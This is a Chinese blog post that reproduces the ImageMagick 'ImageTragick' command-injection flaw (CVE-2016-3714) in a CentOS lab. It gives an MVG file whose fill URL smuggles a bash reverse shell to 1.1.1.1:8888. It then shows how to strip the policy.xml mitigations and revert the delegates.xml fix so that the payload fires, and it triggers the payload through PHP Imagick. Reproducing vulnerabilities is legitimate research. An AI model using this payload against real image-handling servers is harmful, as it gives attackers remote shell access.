关闭

ImageMagick 漏洞复现之路

1098人阅读 评论(0) 收藏 举报
分类:
我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的,
我们看看官方都是怎么修复的,并且还原漏洞现场
漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2016-3714%20-%20ImageMagick%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90.html

首先安装ImageMagick:
参考:http://jingyan.baidu.com/article/91f5db1be6ded11c7f05e3d3.html
yum install ImageMagick
yum install ImageMagick-devel
yum install php-pear
yum -y install php-devel
yum install gcc
pecl install imagick (这个之内在php 5.3的版本以上才能安装成功)
 echo extension=imagick.so >> /etc/php.ini  (这个是将ImageMagick加载到php中)
这个时候我们vim test.mvg

内容是:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context

保存,然后

converttest.mvg test.png

发现没有权限

我查看:

/etc/ImageMagick/policy.xml

发现在配置文件里面已经加入了修复配置:

<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>

我删掉这些

然后再运行一下,依然不成功,我继续查看:/etc/ImageMagick/delegates.xml

查找https

发现:

修复前配置文件的https部分:

<delegatedecode="https" command="&quot;curl&quot; -s -k-o &quot;%o&quot; &quot;https:%M&quot;"/>

修复后:

<delegatedecode="https" command="&quot;curl&quot; -s -k-o &quot;%o&quot; &quot;https:%F&quot;"/>

红色部分就是官方修复的位置

将配置文件修改之后:

converttest.mvg test.png

成功出发漏洞,反弹一个shell回本机



写一个php文件来证明这个漏洞:

<?php
$thu= new Imagick();
$thu->readImage('test.mvg');
$thu->writeImage('KKKK.png');
$thu->clear();
$thu->destroy();
unlink("KKKK.png");
?>

phptest.php 来执行一下

成功触发,并且反弹



0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:105031次
    • 积分:1885
    • 等级:
    • 排名:千里之外
    • 原创:85篇
    • 转载:7篇
    • 译文:0篇
    • 评论:36条
    文章分类
    最新评论